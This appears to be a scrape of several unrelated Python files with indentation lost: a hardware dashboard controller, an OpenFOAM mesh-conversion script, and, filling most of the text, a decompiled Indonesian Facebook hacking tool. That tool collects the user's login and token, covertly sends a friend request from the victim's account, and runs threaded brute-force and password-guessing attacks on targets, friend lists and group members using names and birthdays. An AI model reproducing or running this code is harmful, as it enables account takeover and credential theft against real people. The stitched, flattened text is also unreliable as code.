self._update_all_items()
time.sleep(0.5)
thread = Thread(target=update)
thread.start()
def _update_all_items(self):
"""
Update all items
:return:
"""
for input_id in self._view.get_input_ids():
self._view.set_input(input_id, (ApiInput(input_id)).on)
for output_id in self._view.get_output_ids():
self._view.set_output(output_id, (ApiOutput(output_id)).on)
for analog_id in self._view.get_analog_ids():
self._view.set_analog(analog_id, (ApiAnalog(analog_id)).value)
for motor_id in self._view.get_motor_ids():
self._view.set_motor(motor_id, (ApiMotor(motor_id)).speed)
def _on_output_toggle(self, output_id):
"""
On output toggle
:param output_id:
:return:
"""
(ApiOutput(output_id)).toggle()
# This is a fix so the dashboard keeps updating.
self._view._outputs[output_id].focus()
def _on_motor_min_click(self, motor_id):
"""
On motor min click
:param motor_id:
:return:
"""
motor = ApiMotor(motor_id)
speed = motor.speed
speed -= 10
if speed < -100:
speed = -100
motor.speed = speed
# This is a fix so the dashboard keeps updating.
self._view._motors[motor_id].focus()
def _on_motor_plus_click(self, motor_id):
"""
On motor plus click
:param motor_id:
:return:
"""
motor = ApiMotor(motor_id)
speed = motor.speed
speed += 10
if speed > 100:
speed = 100
motor.speed = speed
# This is a fix so the dashboard keeps updating.
self._view._motors[motor_id].focus()
def _on_exit(self):
"""
On exit click
:return:
"""
disconnecting_view = DisconnectingView(self._screen)
self._view.add_effect_to_scene(disconnecting_view)
self._connection.close()
disconnecting_view.close()
self._change_scene("Dashboard")
|
meshConvertT.py
|
import os
from threading import Thread
def f(name):
if os.path.isdir(name) and name != "blank_foamcase":
oldDir = os.getcwd()
os.system('cd ~/OpenFOAM/tjc2017-7/run')
os.chdir(oldDir)
os.chdir(name)
os.system('gmshToFoam busemann.msh')
os.chdir(oldDir)
if __name__ == "__main__":
dirs = os.listdir()
for name in dirs:
t = Thread(target=f, args=(name,))
t.start()
|
SDK.py
|
#Decompiled by MR.K7C8NG
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Keluar'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = '\x1b[1;92m\n\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97 \n \xe2\x95\x91\xe2\x95\x91\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x9c\xe2\x94\xac\xe2\x94\x98\xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xa0\xe2\x95\xa3 \xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\n\xe2\x95\x90\xe2\x95\xa9\xe2\x95\x9d\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\xb4 \xe2\x94\xb4 \xe2\x95\x9a \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \x1b[1;93mv1.6\n\x1b[1;93m* \x1b[1;97mAuthor \x1b[1;91m: \x1b[1;96mMR.K7C8NG\x1b[1;97m\n\x1b[1;93m* \x1b[1;97mSupport \x1b[1;91m: \x1b[1;96mInDoNeSiA CYBER ErRoR SyStEm\x1b[1;97m[\x1b[1;96m\x1b[1;97m] \x1b[1;97m/ \x1b[1;96mGUNAKAN DENGAN BIJAK \x1b[1;97m/ \x1b[1;96mMR.K7C8NG\n\x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m\x1b[4mhttps://github.com/pashayogi\x1b[0m\n[*] Decompiled by MR.K7C8NG\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mSedang Masuk COK \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idteman = []
idfromteman = []
idmem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLOGIN AKUN FACEBOOK AKUN FB \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername FB \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword FB \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
menu ()
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Login Gagal'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Tidak ada koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Nama \x1b[1;91m: \x1b[1;92m' + nama
print '\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90'
print '\x1b[1;37;40m1. Informasi Pengguna'
print '\x1b[1;37;40m2. Hack Akun Facebook'
print '\x1b[1;37;40m3. Bot '
print '\x1b[1;37;40m4. Lainnya.... '
print '\x1b[1;37;40m5. LogOut '
print '\x1b[1;31;40m0. Keluar '
print
pilih()
def pilih():
zedd = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('rm -rf login.txt')
os.system('xdg-open https://www.youtube.com/nganunymous')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mTidak ada'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor HP\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTanggal Lahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mTanggal Lahir\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m2. Multi Bruteforce Facebook'
print '\x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '\x1b[1;37;40m4. BruteForce(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m5. Yahoo Checker'
print '\x1b[1;37;40m6. Ambil id/email/hp'
print '\x1b[1;31;40m0. Kembali'
print
hack_pilih()
def hack_pilih():
hack = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Jangan kosong'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mTidak ada'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Akun target harus berteman dengan akun anda dulu !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mMemeriksa \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mMembuka keamanan \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Maaf, gagal membuka password target :('
print '\x1b[1;91m[!] Cobalah dengan cara lain.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Koneksi terganggu'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
def hasil():
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Crack dari daftar Teman'
print '\x1b[1;37;40m2. Crack dari member Grup'
print '\x1b[1;31;40m0. Kembali'
print
pilih_super()
def pilih_super():
peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
